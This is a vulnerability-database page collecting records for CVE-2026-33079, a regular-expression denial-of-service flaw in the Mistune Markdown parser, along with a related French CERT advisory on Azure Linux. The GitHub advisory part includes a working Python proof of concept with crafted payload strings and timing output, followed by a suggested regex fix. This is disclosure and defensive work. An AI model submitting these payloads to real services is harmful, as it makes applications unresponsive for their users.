Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-33079 (GCVE-0-2026-33079)
Vulnerability from cvelistv5 – Published: 2026-05-06 17:25 – Updated: 2026-05-06 19:02- CWE-1333 - Inefficient Regular Expression Complexity
| URL | Tags |
|---|---|
| https://github.com/lepture/mistune/security/advis… | x_refsource_CONFIRM |
| https://github.com/lepture/mistune/blob/df23edd60… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33079",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-06T19:02:37.046157Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-06T19:02:51.759Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "mistune",
"vendor": "lepture",
"versions": [
{
"status": "affected",
"version": "\u003e=3.0.0a1, \u003c= 3.2.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1333",
"description": "CWE-1333: Inefficient Regular Expression Complexity",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-06T17:25:09.026Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp"
},
{
"name": "https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25"
}
],
"source": {
"advisory": "GHSA-8mp2-v27r-99xp",
"discovery": "UNKNOWN"
},
"title": "Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titles"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33079",
"datePublished": "2026-05-06T17:25:09.026Z",
"dateReserved": "2026-03-17T19:27:06.345Z",
"dateUpdated": "2026-05-06T19:02:51.759Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-33079",
"date": "2026-05-31",
"epss": "0.0002",
"percentile": "0.06028"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33079\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-06T18:16:03.097\",\"lastModified\":\"2026-05-07T15:43:39.827\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1333\"}]}],\"references\":[{\"url\":\"https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33079\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-06T19:02:37.046157Z\"}}}], \"references\": [{\"url\": \"https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-06T19:02:48.489Z\"}}], \"cna\": {\"title\": \"Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titles\", \"source\": {\"advisory\": \"GHSA-8mp2-v27r-99xp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"lepture\", \"product\": \"mistune\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e=3.0.0a1, \u003c= 3.2.0\"}]}], \"references\": [{\"url\": \"https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp\", \"name\": \"https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25\", \"name\": \"https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1333\", \"description\": \"CWE-1333: Inefficient Regular Expression Complexity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-06T17:25:09.026Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-33079\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-06T19:02:51.759Z\", \"dateReserved\": \"2026-03-17T19:27:06.345Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-06T17:25:09.026Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2026-AVI-0608
Vulnerability from certfr_avis - Published: 2026-05-18 - Updated: 2026-05-18
De multiples vulnérabilités ont été découvertes dans Microsoft Azure Linux. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Microsoft | N/A | azl3 telegraf 1.31.0-19 versions antérieures à 1.31.0-20 | ||
| Microsoft | N/A | azl3 binutils 2.41-11 versions antérieures à 2.41-12 | ||
| Microsoft | N/A | azl3 gdb 13.2-7 versions antérieures à 13.2-8 | ||
| Microsoft | N/A | azl3 python-mistune 3.0.2-1 versions antérieures à 3.2.1-1 | ||
| Microsoft | N/A | azl3 httpd 2.4.66-1 versions antérieures à 2.4.67-1 | ||
| Microsoft | N/A | azl3 coredns 1.11.4-15 versions antérieures à 1.11.4-16 | ||
| Microsoft | N/A | azl3 fio 3.37-3 versions antérieures à 3.37-4 |
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "azl3 telegraf 1.31.0-19 versions ant\u00e9rieures \u00e0 1.31.0-20",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 binutils 2.41-11 versions ant\u00e9rieures \u00e0 2.41-12",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 gdb 13.2-7 versions ant\u00e9rieures \u00e0 13.2-8",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 python-mistune 3.0.2-1 versions ant\u00e9rieures \u00e0 3.2.1-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 httpd 2.4.66-1 versions ant\u00e9rieures \u00e0 2.4.67-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 coredns 1.11.4-15 versions ant\u00e9rieures \u00e0 1.11.4-16",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 fio 3.37-3 versions ant\u00e9rieures \u00e0 3.37-4",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-33190",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33190"
},
{
"name": "CVE-2026-6846",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-6846"
},
{
"name": "CVE-2026-33007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33007"
},
{
"name": "CVE-2026-30656",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30656"
},
{
"name": "CVE-2026-42154",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42154"
},
{
"name": "CVE-2026-33857",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33857"
},
{
"name": "CVE-2026-33489",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33489"
},
{
"name": "CVE-2026-32936",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32936"
},
{
"name": "CVE-2026-23918",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23918"
},
{
"name": "CVE-2026-24072",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24072"
},
{
"name": "CVE-2026-29168",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29168"
},
{
"name": "CVE-2026-33079",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33079"
},
{
"name": "CVE-2026-29169",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29169"
},
{
"name": "CVE-2026-34032",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34032"
},
{
"name": "CVE-2026-33006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33006"
},
{
"name": "CVE-2026-34059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34059"
},
{
"name": "CVE-2026-32934",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32934"
},
{
"name": "CVE-2026-33523",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33523"
}
],
"initial_release_date": "2026-05-18T00:00:00",
"last_revision_date": "2026-05-18T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0608",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-05-18T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans Microsoft Azure Linux. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans Microsoft Azure Linux ",
"vendor_advisories": [
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-32934",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32934"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-42154",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42154"
},
{
"published_at": "2026-05-03",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-6846",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-6846"
},
{
"published_at": "2026-05-03",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-30656",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-30656"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-24072",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24072"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-34059",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34059"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-32936",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32936"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33007",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33007"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33190",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33190"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23918",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23918"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-29168",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-29168"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33523",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33523"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33857",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33857"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33489",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33489"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33006",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33006"
},
{
"published_at": "2026-05-10",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33079",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33079"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-29169",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-29169"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-34032",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34032"
}
]
}
FKIE_CVE-2026-33079
Vulnerability from fkie_nvd - Published: 2026-05-06 18:16 - Updated: 2026-05-07 15:43| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25 | ||
| security-advisories@github.com | https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp |
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive."
}
],
"id": "CVE-2026-33079",
"lastModified": "2026-05-07T15:43:39.827",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-06T18:16:03.097",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-1333"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-8MP2-V27R-99XP
Vulnerability from github – Published: 2026-05-06 16:52 – Updated: 2026-05-06 19:35Summary
A ReDoS (Regular Expression Denial of Service) vulnerability in LINK_TITLE_RE allows an attacker who can supply Markdown for parsing to cause denial of service. A crafted 58-byte Markdown document blocks the parser for approximately 6 seconds (measured on Apple M2, Python 3.14.3), with exponential growth per additional byte pair.
Details
The vulnerable regex is defined in src/mistune/helpers.py#L20-L25:
LINK_TITLE_RE = re.compile(
r"[ \t\n]+("
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"|' # "title"
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'" # 'title'
r")"
)
The double-quote branch compiles to "(?:\\[PUNCTUATION]|[^"\x00])*". The two alternatives inside (A|B)* overlap: a backslash followed by a punctuation character (e.g. \!) can be matched by either branch — as a 2-character escaped-punctuation sequence \\!, or as two individual [^"\x00] characters (\ then !). The same ambiguity exists in the single-quoted title branch.
When the input contains repeated \! pairs with no closing ", the regex engine exhaustively backtracks through all 2^N combinations, resulting in exponential O(2^N) time complexity.
This is reachable through normal Markdown parsing via two code paths:
1. Inline links: [text](url "PAYLOAD) → parse_link() → parse_link_title()
2. Block link reference definitions: [label]: url "PAYLOAD → BlockParser.parse_ref_link() → parse_link_title() at block_parser.py#L259
PoC
import mistune
import time
md = mistune.create_markdown()
# Test with increasing N (number of \! pairs)
for n in [15, 18, 20, 22, 25]:
payload = '[x](y "' + '\\!' * n + ')'
start = time.time()
md(payload)
elapsed = time.time() - start
print(f"N={n:2d} len={len(payload):3d} bytes time={elapsed:.3f}s")
Output (Apple M2, Python 3.14.3, mistune 3.2.0):
N=15 len= 38 bytes time=0.007s
N=18 len= 44 bytes time=0.044s
N=20 len= 48 bytes time=0.178s
N=22 len= 52 bytes time=0.740s
N=25 len= 58 bytes time=5.922s
Each increment of N roughly doubles the execution time (consistent with O(2^N)).
The same attack works via block link reference definitions:
payload = '[l]: u "' + '\\!' * 25 # 58 bytes, ~6 seconds
md(payload)
Impact
This is a denial of service vulnerability. Any application or service that parses user-supplied Markdown using mistune can be made unresponsive by an attacker submitting a small crafted input (under 100 bytes).
Affected use cases include: - Web applications with Markdown-enabled input fields (comments, posts, descriptions) - Documentation systems that accept user contributions - API endpoints that process Markdown - Jupyter tooling such as nbconvert that relies on mistune for rendering
Suggested Fix
Exclude the backslash character from the catch-all character class to eliminate the alternation overlap:
# Before (vulnerable):
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"
# After (fixed):
r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\\\x00])*'"
This ensures a backslash can only be consumed by the escaped-punctuation branch, eliminating the ambiguity in both the double-quote and single-quote branches. Verified on mistune 3.2.0 (Apple M2, Python 3.14.3): - Reduces N=25 from 4.2 seconds to 0.000006 seconds (700,000x improvement) - Handles N=50 in 0.000008 seconds - Passes all existing functional tests (quoted titles, escaped quotes, escaped punctuation)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.0"
},
"package": {
"ecosystem": "PyPI",
"name": "mistune"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0a1"
},
{
"fixed": "3.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33079"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T16:52:43Z",
"nvd_published_at": "2026-05-06T18:16:03Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` allows an attacker who can supply Markdown for parsing to cause denial of service. A crafted 58-byte Markdown document blocks the parser for approximately 6 seconds (measured on Apple M2, Python 3.14.3), with exponential growth per additional byte pair.\n\n### Details\n\nThe vulnerable regex is defined in [`src/mistune/helpers.py#L20-L25`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25):\n\n```python\nLINK_TITLE_RE = re.compile(\n r\"[ \\t\\n]+(\"\n r\u0027\"(?:\\\\\u0027 + PUNCTUATION + r\u0027|[^\"\\x00])*\"|\u0027 # \"title\"\n r\"\u0027(?:\\\\\" + PUNCTUATION + r\"|[^\u0027\\x00])*\u0027\" # \u0027title\u0027\n r\")\"\n)\n```\n\nThe double-quote branch compiles to `\"(?:\\\\[PUNCTUATION]|[^\"\\x00])*\"`. The two alternatives inside `(A|B)*` overlap: a backslash followed by a punctuation character (e.g. `\\!`) can be matched by **either** branch \u2014 as a 2-character escaped-punctuation sequence `\\\\!`, or as two individual `[^\"\\x00]` characters (`\\` then `!`). The same ambiguity exists in the single-quoted title branch.\n\nWhen the input contains repeated `\\!` pairs with no closing `\"`, the regex engine exhaustively backtracks through all 2^N combinations, resulting in **exponential O(2^N) time complexity**.\n\nThis is reachable through normal Markdown parsing via two code paths:\n1. **Inline links**: `[text](url \"PAYLOAD)` \u2192 